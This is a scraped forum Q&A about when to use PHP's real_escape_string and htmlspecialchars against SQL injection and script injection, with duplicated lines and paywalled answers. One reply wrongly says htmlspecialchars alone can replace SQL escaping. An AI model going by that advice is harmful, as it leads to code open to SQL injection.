Nura111
asked on
whe would I need to use real_escape_string() function in mysqli class
whe would I need to use real_escape_string() function in mysqli class I read the
explantion in http://php.net/manual/en/function.stripslashes.php
but im not sure I understand what it does and when to use it
explantion in http://php.net/manual/en/function.stripslashes.php
but im not sure I understand what it does and when to use it
Use it on everything that is not an internally generated integer. It will cause no harm and may save your bacon some day!
ASKER
is ti also a security issue if not using it?
Yes, it can prevent a foreign agent from injecting information into your queries. Look up SQL injection on this and other sites
http://en.wikipedia.org/wiki/SQL_injection
http://en.wikipedia.org/wiki/SQL_injection
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
Is it the same issue as not using htmlspecialchars() on a input from a user?
Is there a need to use both?
Is there a need to use both?
ASKER
another thing : so you mean to use: mysql_real_escape_string()
on the input before its been used to insert to the db or other right?
so what is the issue when using {$row['id']} in an html form e.g
<td>{$row['id']}</td>
<td>{$row['timestamp']}</t d>
<td>{$row['email_address'] }</td>
<td>{$fromAddress}</td>
without htmlspecialchars() before I been told its a secruity issue as well I don't understand why
on the input before its been used to insert to the db or other right?
so what is the issue when using {$row['id']} in an html form e.g
<td>{$row['id']}</td>
<td>{$row['timestamp']}</t
<td>{$row['email_address']
<td>{$fromAddress}</td>
without htmlspecialchars() before I been told its a secruity issue as well I don't understand why
You do not need to use both. I personally prefer and use htmlspecialchars() on all text input.
The difference is that mysql_real_escape_string just safeties the SQL injection hacking, but not certain other kinds of things. htmlspecialchars changes ALL special characters into their html &#xxx code equivalents.
The only drawback to using htmlspecialchars is that it takes a few more bytes in your database ... each special character takes 5 bytes instead of 1 ... so if you have a LOT of text with special characters stored, that might be a problem.
The advantage of using htmlspecialchars is that it safeties more things, for example not letting some evil javascript into your database that might be exploited later.
The difference is that mysql_real_escape_string just safeties the SQL injection hacking, but not certain other kinds of things. htmlspecialchars changes ALL special characters into their html &#xxx code equivalents.
The only drawback to using htmlspecialchars is that it takes a few more bytes in your database ... each special character takes 5 bytes instead of 1 ... so if you have a LOT of text with special characters stored, that might be a problem.
The advantage of using htmlspecialchars is that it safeties more things, for example not letting some evil javascript into your database that might be exploited later.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
real_escape_string() function places a backslash before some dangerous characters such as NUL (ASCII 0), \n, \r, \, ', ", and Control-Z. (http://it.php.net/manual/en/mysqli.real-escape-string.php) This is useful every time you have to insert values into a database preventing to insert bad data. As php manual says, you have to use this function every time you send a query to mysql.